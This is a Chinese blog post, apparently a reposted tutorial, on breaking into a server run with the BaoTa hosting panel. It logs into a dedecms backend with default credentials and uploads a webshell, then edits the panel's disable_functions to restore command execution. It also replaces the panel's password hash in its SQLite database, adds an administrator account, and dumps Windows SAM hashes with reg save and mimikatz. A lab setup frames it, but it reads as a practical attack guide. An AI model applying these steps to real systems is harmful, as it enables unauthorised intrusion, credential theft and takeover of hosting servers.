我是如何绕过宝塔system命令的disable_fuction的
liebian365 2024-11-13 13:24 27 浏览 0 评论
大家平时日站的时候最讨厌看到什么?
云盾还是宝塔? 就我而言是宝塔(碰到的比较多),所以借用kelper大佬的思路写了一篇对宝塔的渗透实战
搭建集成环境
登录宝塔后台
选择apache控件,等待安装
选择php版本5.6
设置网站信息
记得选择php5.6的版本
安装dedecms
.user.ini文件
控制网站只允许访问的目录
open_basedir="C:/wwwroot/192.168.0.102/;C:/Windows/Temp/;C:/Temp/;C:/BtSoft/temp/session/"
?
.user.ini是lnmp文件,里面放的是你网站的文件夹路径地址。目的是防止跨目录访问和文件跨目录读取.
配置 放在根目录 .user.ini
open_basedir=/项目路径/:/tmp/:/proc/
?
例: open_basedir=/www/aaa/:/tmp/:/proc/ 安装
getshell dedecms
利用默认密码登录后台
上传我们的大马
打开webshell
执行不了命令
宝塔禁用了函数
删除system函数使得可以执行系统命令
成功执行命令
whoami /priv
查看当前权限详细情况
特权信息
----------------------
?
特权名 描述 状态
=============================== ========================== ======
SeAssignPrimaryTokenPrivilege 替换一个进程级令牌 已禁用
SeLockMemoryPrivilege 锁定内存页 已启用
SeIncreaseQuotaPrivilege 为进程调整内存配额 已禁用
SeTcbPrivilege 以操作系统方式执行 已启用
SeSecurityPrivilege 管理审核和安全日志 已禁用
SeTakeOwnershipPrivilege 取得文件或其他对象的所有权 已禁用
SeLoadDriverPrivilege 加载和卸载设备驱动程序 已禁用
SeSystemProfilePrivilege 配置文件系统性能 已启用
SeSystemtimePrivilege 更改系统时间 已禁用
SeProfileSingleProcessPrivilege 配置文件单一进程 已启用
SeIncreaseBasePriorityPrivilege 提高计划优先级 已启用
SeCreatePagefilePrivilege 创建一个页面文件 已启用
SeCreatePermanentPrivilege 创建永久共享对象 已启用
SeBackupPrivilege 备份文件和目录 已禁用
SeRestorePrivilege 还原文件和目录 已禁用
SeShutdownPrivilege 关闭系统 已禁用
SeDebugPrivilege 调试程序 已启用
SeAuditPrivilege 生成安全审核 已启用
SeSystemEnvironmentPrivilege 修改固件环境值 已禁用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeUndockPrivilege 从扩展坞上取下计算机 已禁用
SeManageVolumePrivilege 执行卷维护任务 已禁用
SeImpersonatePrivilege 身份验证后模拟客户端 已启用
SeCreateGlobalPrivilege 创建全局对象 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用
SeTimeZonePrivilege 更改时区 已启用
SeCreateSymbolicLinkPrivilege 创建符号链接 已启用我们对网站的配置文件进行搜集,看有没有可以利用的密码
方便用于后面的渗透
随机加密的,可利用可能不太大
渗透宝塔的思路
找到宝塔的安装目录,看里面的配置文件,有个配置文件是放着宝塔的安全校验码,也就是ip:8888/qweasdasd这种类型的校验码
还有一种思路,通过把存放宝塔密码的文件替换掉,存放宝塔密码在后缀db的文件下,宝塔的db文件里面为账号,密码(md5值加密,如果无法破解,可以自己加密md5值,之后替换db文件,实现密码重置)记得多翻翻宝塔的配置文件,config下
宝塔关键目录
宝塔面板关键目录解析
2
3
/www/
4
├── backup ---------------------------------------->宝塔面板的备份文件目录
5
│ ├── database------------------------------------>宝塔面板的数据库备份目录
6
│ ├── panel--------------------------------------->宝塔面板配置自动备份目录(6.9.32版本新添加)
7
│ │ └── 2019-10-16------------------------------>宝塔面板配置自动备份的文件,默认是以年月日格式备份,数量为15天
8
│ └── site---------------------------------------->宝塔面板站点备份目录
9
├── server------------------------------------------>宝塔面板服务目录(比较关键)
10
│ ├── data---------------------------------------->mysql数据库服务的目录
11
├── dapao.err----------------------------------->数据库错误日志文件(比较重要,数据库启动不了可以将此日志文件打开,找到最新的日志发给DBA进行分析错误)
12
├── dapao.pid------------------------------->存放数据库pid的文件
13
│ ├── nginx--------------------------------------->nginx的主目录
14
│ │ ├── client_body_temp
15
│ │ ├── conf------------------------------------>nginx的默认配置目录
16
│ │ ├── fastcgi_temp
17
│ │ ├── html
18
│ │ │ ├── 50x.html
19
│ │ │ └── index.html
20
│ │ ├── logs-------------------------------------->nginx的日志目录
21
│ │ │ ├── error.log
22
│ │ │ └── nginx.pid
23
│ │ ├── off
24
│ │ ├── proxy_cache_dir
25
│ │ ├── proxy_temp_dir
26
│ │ ├── rpm.pl
27
│ │ ├── sbin
28
│ │ │ └── nginx-------------------------------->nginx的启动文件
29
│ │ ├── scgi_temp
30
│ │ ├── uwsgi_temp
31
│ │ ├── version.pl
32
│ │ └── waf
33
│ │ ├── config.lua
34
│ │ ├── init.lua
35
│ │ └── waf.lua
36
│ ├── panel----------------------------------------->面板文件目录(最为重要)
37
│ │ ├── BTPanel
38
│ │ ├── class
39
│ │ ├── config
40
│ │ ├── data
41
│ │ ├── default.pl 存放默认校验码的地方
42
│ │ ├── init.sh
43
│ │ ├── install----------------------------------->面板软件安装脚本路径
44
│ │ │ ├── install_soft.sh
45
│ │ │ ├── lib.sh
46
│ │ │ ├── mysql.sh
47
│ │ │ ├── nginx.sh
48
│ │ │ ├── phpmyadmin.sh
49
│ │ │ ├── php.sh
50
│ │ │ ├── public.sh------------------------------>安装软件主脚本
51
│ │ │ └── pureftpd.sh
52
│ │ ├── license.txt
53
│ │ ├── logs--------------------------------------->面板日志存放目录
54
│ │ │ ├── access.log----------------------------->面板访问日志文件
55
│ │ │ ├── certbot.log
56
│ │ │ ├── error.log-------------------------------->面板错误日志文件
57
(面板打不开或者软件安装不了,可以打开这个文件将最新的日志信息发到宝塔论坛)
58
│ │ │ ├── panel.pid
59
│ │ │ ├── request
60
│ │ │ │ └── 2019-10-16.json
61
│ │ │ └── task.log
62
│ │ ├── rewrite------------------------------------->伪静态存放目录
63
│ │ │ ├── apache---------------------------------->apache默认的伪静态规则目录
64
│ │ │ │ ├── dedecms.conf
65
│ │ │ │ ├── default.conf
66
│ │ │ │ ├── discuzx2.conf
67
│ │ │ │ ├── discuzx3.conf
68
│ │ │ │ ├── discuzx.conf
69
│ │ │ │ ├── ecshop.conf
70
│ │ │ │ ├── EmpireCMS.conf
71
│ │ │ │ ├── list.txt
72
│ │ │ │ ├── mvc.conf
73
│ │ │ │ ├── phpcms.conf
74
│ │ │ │ ├── phpwind.conf
75
│ │ │ │ ├── thinkphp.conf
76
│ │ │ │ ├── wordpress.conf
77
│ │ │ │ └── zblog.conf
78
│ │ │ └── nginx----------------------------------->nginx默认的伪静态规则存放目录
79
│ │ │ ├── dabr.conf
80
│ │ │ ├── dbshop.conf
81
│ │ │ ├── dedecms.conf
82
│ │ │ ├── default.conf
83
│ │ │ ├── discuz.conf
84
│ │ │ ├── discuzx2.conf
85
│ │ │ ├── discuzx3.conf
86
│ │ │ ├── discuzx.conf
87
│ │ │ ├── drupal.conf
88
│ │ │ ├── ecshop.conf
89
│ │ │ ├── emlog.conf
90
│ │ │ ├── EmpireCMS.conf
91
│ │ │ ├── laravel5.conf
92
│ │ │ ├── maccms.conf
93
│ │ │ ├── mvc.conf
94
│ │ │ ├── niushop.conf
95
│ │ │ ├── phpcms.conf
96
│ │ │ ├── phpwind.conf
97
│ │ │ ├── sablog.conf
98
│ │ │ ├── seacms.conf
99
│ │ │ ├── shopex.conf
100
│ │ │ ├── thinkphp.conf
101
│ │ │ ├── typecho2.conf
102
│ │ │ ├── typecho.conf
103
│ │ │ ├── wordpress.conf
104
│ │ │ ├── wp2.conf
105
│ │ │ └── zblog.conf
106
│ │ ├── runconfig.py
107
│ │ ├── runserver.py
108
│ │ ├── runserver.pyc
109
│ │ ├── script----------------------------------------------->面板计划任务备份脚本目录
110
│ │ │ ├── backup
111
│ │ │ ├── backup.py
112
│ │ │ ├── ftp.sh
113
│ │ │ ├── GetOS.sh
114
│ │ │ ├── install.sh
115
│ │ │ ├── logsBackup
116
│ │ │ ├── logsBackup.py
117
│ │ │ └── rememory.sh
118
│ │ ├── ssl-------------------------------------------------->面板证书目录
119
│ │ │ ├── certificate.pem
120
│ │ │ └── privateKey.pem
121
│ │ ├── task.py
122
│ │ ├── tmp
123
│ │ ├── tools.py
124
│ │ ├── tools.pyc
125
│ │ └── vhost------------------------------------------------>站点配置文件目录
126
│ │ ├── apache------------------------------------------->apache 站点配置文件目录
127
│ │ │ ├── 0.default.conf
128
│ │ │ └── dapao.com.conf
129
│ │ ├── cert--------------------------------------------->站点证书目录
130
│ │ ├── nginx-------------------------------------------->nginx站点配置文件目录
131
│ │ │ ├── 0.default.conf
132
│ │ │ ├── dapao.com.conf
133
│ │ │ └── phpfpm_status.conf
134
│ │ ├── rewrite----------------------------------------->站点重定向配置文件目录
135
│ │ │ └── dapao.com.conf
136
│ │ ├── template
137
│ │ │ ├── apache
138
│ │ │ └── nginx
139
│ │ │ ├── anti.conf
140
│ │ │ ├── error_page.conf
141
│ │ │ ├── other.conf
142
│ │ │ ├── proxy.conf
143
│ │ │ ├── redirect.conf
144
│ │ │ └── ssl.conf
145
│ │ ├── tomcat------------------------------------------->tomcat站点配置文件目录
146
│ │ └── wafconf
147
│ │ ├── args
148
│ │ ├── blockip
149
│ │ ├── cookie
150
│ │ ├── denycc
151
│ │ ├── post
152
│ │ ├── returnhtml
153
│ │ ├── url
154
│ │ ├── user-agent
155
│ │ ├── whiteip
156
│ │ └── whiteurl
157
│ ├── php-------------------------------------------------------->php安装目录
158
│ │ └── 54
159
│ ├── phpmyadmin
160
│ ├── pure-ftpd
161
├── wwwlogs-------------------------------------------------------->站点日志目录(当站点打不开或者出错,将最新错误日志发到论坛)
162
│ ├── access.log
163
│ ├── dapao.com.error.log
164
│ ├── dapao.com.log
165
│ ├── nginx_error.log
166
│ └── waf
167
├── wwwroot-------------------------------------------------------->站点根目录
168
│ └── dapao.com
169
│ ├── 404.html
170
│ └── index.html
?
Windows常用命令
whoami查看当前权限
whoami /all 查当前用户在目标系统中的具体权限,这可能会成为你一上来的习惯性动作 ^_^
query user 查当前机器中正在线的用户,注意管理员此时在不在
hostname 查当前机器的机器名,知道当前机器是干啥的
net user查看当前用户列表
net user text查看用户具体信息
net localgroup 查当前机器中所有的组名,了解不同组的职能,如,IT,HR,ADMIN,FILE...
net localgroup "Administrators" 查指定组中的成员列表
添加用户到管理员
net user 用户名 密码 /add
net localgroup administrators 用户名 /addwebshell替换宝塔登录密码
下载出宝塔的登录存放的数据库
校验码的路径:
C:/BtSoft/panel/data/admin_path.pl
C:/BtSoft/panel/data/default.pl
?
//我们就可以组成网址
http://192.168.0.102:8888/rNwgs4dA/使用
下载下来,SQLiteStudio导入数据库进行查看
密码是md5加密是无法解
获取账号密码
我们替换数据的加密密码,移除数据库,将其此数据库上传
使用修改的密码登录成功
s
windows密码导出
reg save HKLM\SYSTEM Sys.hiv
reg save HKLM\SAM Sam.hiv
?
导出文件Sys.hiv,Sam.hiv文件
然后mimikatz.exe 执行
lsadump::sam m:Sam.hiv /system:Sys.hivwindows远程访问控制
打开3389端口
相关推荐
- 4万多吨豪华游轮遇险 竟是因为这个原因……
-
(观察者网讯)4.7万吨豪华游轮搁浅,竟是因为油量太低?据观察者网此前报道,挪威游轮“维京天空”号上周六(23日)在挪威近海发生引擎故障搁浅。船上载有1300多人,其中28人受伤住院。经过数天的调...
- “菜鸟黑客”必用兵器之“渗透测试篇二”
-
"菜鸟黑客"必用兵器之"渗透测试篇二"上篇文章主要针对伙伴们对"渗透测试"应该如何学习?"渗透测试"的基本流程?本篇文章继续上次的分享,接着介绍一下黑客们常用的渗透测试工具有哪些?以及用实验环境让大家...
- 科幻春晚丨《震动羽翼说“Hello”》两万年星间飞行,探测器对地球的最终告白
-
作者|藤井太洋译者|祝力新【编者按】2021年科幻春晚的最后一篇小说,来自大家喜爱的日本科幻作家藤井太洋。小说将视角放在一颗太空探测器上,延续了他一贯的浪漫风格。...
- 麦子陪你做作业(二):KEGG通路数据库的正确打开姿势
-
作者:麦子KEGG是通路数据库中最庞大的,涵盖基因组网络信息,主要注释基因的功能和调控关系。当我们选到了合适的候选分子,单变量研究也已做完,接着研究机制的时便可使用到它。你需要了解你的分子目前已有哪些...
- 知存科技王绍迪:突破存储墙瓶颈,详解存算一体架构优势
-
智东西(公众号:zhidxcom)编辑|韦世玮智东西6月5日消息,近日,在落幕不久的GTIC2021嵌入式AI创新峰会上,知存科技CEO王绍迪博士以《存算一体AI芯片:AIoT设备的算力新选择》...
- 每日新闻播报(September 14)_每日新闻播报英文
-
AnOscarstatuestandscoveredwithplasticduringpreparationsleadinguptothe87thAcademyAward...
- 香港新巴城巴开放实时到站数据 供科技界研发使用
-
中新网3月22日电据香港《明报》报道,香港特区政府致力推动智慧城市,鼓励公私营机构开放数据,以便科技界研发使用。香港运输署21日与新巴及城巴(两巴)公司签署谅解备忘录,两巴将于2019年第3季度,开...
- 5款不容错过的APP: Red Bull Alert,Flipagram,WifiMapper
-
本周有不少非常出色的app推出,鸵鸟电台做了一个小合集。亮相本周榜单的有WifiMapper's安卓版的app,其中包含了RedBull的一款新型闹钟,还有一款可爱的怪物主题益智游戏。一起来看看我...
- Qt动画效果展示_qt显示图片
-
今天在这篇博文中,主要实践Qt动画,做一个实例来讲解Qt动画使用,其界面如下图所示(由于没有录制为gif动画图片,所以请各位下载查看效果):该程序使用应用程序单窗口,主窗口继承于QMainWindow...
- 如何从0到1设计实现一门自己的脚本语言
-
作者:dong...
- 三年级语文上册 仿写句子 需要的直接下载打印吧
-
描写秋天的好句好段1.秋天来了,山野变成了美丽的图画。苹果露出红红的脸庞,梨树挂起金黄的灯笼,高粱举起了燃烧的火把。大雁在天空一会儿写“人”字,一会儿写“一”字。2.花园里,菊花争奇斗艳,红的似火,粉...
- C++|那些一看就很简洁、优雅、经典的小代码段
-
目录0等概率随机洗牌:1大小写转换2字符串复制...
- 二年级上册语文必考句子仿写,家长打印,孩子照着练
-
二年级上册语文必考句子仿写,家长打印,孩子照着练。具体如下:...
欢迎 你 发表评论:
- 一周热门
- 最近发表
- 标签列表
-
- wireshark怎么抓包 (75)
- qt sleep (64)
- cs1.6指令代码大全 (55)
- factory-method (60)
- sqlite3_bind_blob (52)
- hibernate update (63)
- c++ base64 (70)
- nc 命令 (52)
- wm_close (51)
- epollin (51)
- sqlca.sqlcode (57)
- lua ipairs (60)
- tv_usec (64)
- 命令行进入文件夹 (53)
- postgresql array (57)
- statfs函数 (57)
- .project文件 (54)
- lua require (56)
- for_each (67)
- c#工厂模式 (57)
- wxsqlite3 (66)
- dmesg -c (58)
- fopen参数 (53)
- tar -zxvf -c (55)
- 速递查询 (52)